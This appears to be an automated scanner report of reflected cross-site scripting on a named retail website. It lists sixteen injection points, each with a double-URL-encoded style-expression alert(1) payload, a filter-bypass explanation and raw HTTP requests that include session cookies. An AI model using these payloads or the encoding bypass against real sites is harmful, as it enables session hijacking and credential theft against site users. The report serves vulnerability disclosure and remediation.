Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.2. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/11x17_recordable_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.3. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/11x17_sound_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.4. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/2_year_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.5. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/3_ring_binders
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.6. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/3_subject_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.7. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/5x8_notepads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.8. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/5x8_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.9. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/MLB
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.10. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.11. http://www.turnerlicensing.com/NBA/atlanta_hawks [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/atlanta_hawks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15c9e'style='x:expression(alert(1))'9a17b92c195 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/atlanta_hawks?15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.12. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7e246%20style%3dx%3aexpression(alert(1))%20ac33b6d3649 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e246 style=x:expression(alert(1)) ac33b6d3649 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
1.13. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.14. http://www.turnerlicensing.com/NBA/boston_celtics/8010782 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics/8010782
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32b5b'style='x:expression(alert(1))'f3631ec12da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8010782?32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.15. http://www.turnerlicensing.com/NBA/boston_celtics/8090823 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/boston_celtics/8090823
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1f23'style='x:expression(alert(1))'784b725bfc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8090823?d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.16. http://www.turnerlicensing.com/NBA/boston_celtics/8120527 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/boston_celtics/8120527
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f1c8'style='x:expression(alert(1))'13f6993aa6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8120527?9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
